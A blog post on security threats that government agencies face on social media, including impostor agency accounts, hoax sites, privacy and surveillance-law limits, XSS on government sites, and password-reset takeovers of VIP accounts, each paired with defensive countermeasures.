So most of the security world is familiar with the Web 2.0 and Social Media threats in the private sector. Today we’re going to have an expose on the threats specific to Government because I don’t feel that they’ve been adequately represented in this whole push for Government 2.0 and transparency.
Threat: Evil Twin Agency Attack. A person registers on a social media site using the name of a Government entity. They then represent that entity to the public and say whatever it is that they want that agency to say.
What’s the Big Deal: Since for the most part there is no way to prove the authenticity of Government entities on social media sites short of a “catch us on <social media site>” tag on their .gov homepage. This isn’t an attack unique to Government but because of the authority that people give to Government Internet presences means that the attacker gains perceived legitimacy.
Countermeasures: Monitoring by the agencies looking for their official and unofficial presences on Social Media and Web 2.0 sites. Any new registrations on social media are vetted for authenticity through the agency’s public affairs office. Agencies should have an official presence on social media to reserve their namespace and put these account names on their official website.
Threat: Web Hoax. A non-government person sets up their own social media or website and claims to be the Government.
What’s the Big Deal: This is similar to the evil twin attack only maybe of a different scale. For example, an entire social media site can be set up pretending to be a Government agency doing social networking and collecting data on citizens or asking citizens to do things on behalf of the Government. There is also a thin line between parody and
Countermeasures: Monitoring of URLs that claim to be Government-owned. This is easily done with some Google advanced operators and some RSS fun.
Threat: Privacy Violations on Forums. A Government-operated social media site collects Personally Identifiable Information about visitors when they register to participate in forums, blog comments, etc.
What’s the Big Deal: If you’re a Government agency and going to be collecting PII, you need to do a Privacy Impact Assessment which is overkill if you’re collecting names and email which could be false anyway. However, the PIA is a lengthy process and utterly destroys the quickness of web development as we know it.
Countermeasures: It has been proposed in some circles that Government social media sites use third-party ID providers such as OpenID to authenticate simple commenters and forum posts. This isn’t an original idea, Noel Dickover has been asking around about it for at least 9 months that I know of.
Threat: Monitoring v/s Law Enforcement v/s Intelligence Collection. The Government has to be careful about monitoring social media sites. Depending on which agency is doing it, at some point you collect enough information from enough sources that you’re now monitoring US persons.
What’s the Big Deal: If you’re collecting information and doing traffic analysis on people, you’re most likely running up against wiretap laws and/or FISA.
Countermeasures: Government needs Rules of Engagement for creating 2-way dialog with citizens complete with standards for the following practices:
- RSS feed aggregation for primary and secondary purposes
- RSS feed republishing
- Social networking monitoring for evil twin and hoax site attacks
- Typical “Web 2.0 Marketing” tactics such as group analysis
Threat: Hacked? Not Us! The Government does weird stuff with web sites. My web browser always carps at the government-issued SSL certificates because they use their own certificate authority.
What’s the Big Deal: Even though I know a Government site is legitimate, I still have problems getting alert popups. Being hacked with a XSS or other attack has much more weight than for other sites because people expect to get weird errors from Government sites and just click through. Also the sheer volume of traffic on Government websites means that they are a lucrative target if the attacker’s end goal is to infect desktops.
Countermeasures: The standard web server anti-XSS and other web application security stuff works here. Another happy thing would be to get the Federal CA Certificate embedded in web browsers by default like Thawt and Verisign.
Threat: Oh Hai I Reset Your Password For You AKA “The Sarah Palin Attack”. The password reset functions in social media sites work if you’re not a public figure. Once the details of your life become scrutinized, your pet’s name, mother’s maiden name, etc, all become public knowledge.
What’s the Big Deal: It depends on what kind of data you have in the social media site. This can range anywhere from the attacker getting access to one social media site that they get lucky with to complete pwnage of your VIP’s online accounts.
Countermeasures: Engagement with the social media site to get special considerations for Government VIPS. Use of organizational accounts v/s personal accounts on social media sites. Information poisoning on password reset questions for VIPs–don’t put the real data up there. =)
Tranparency in Action photo by Jeff Belmonte.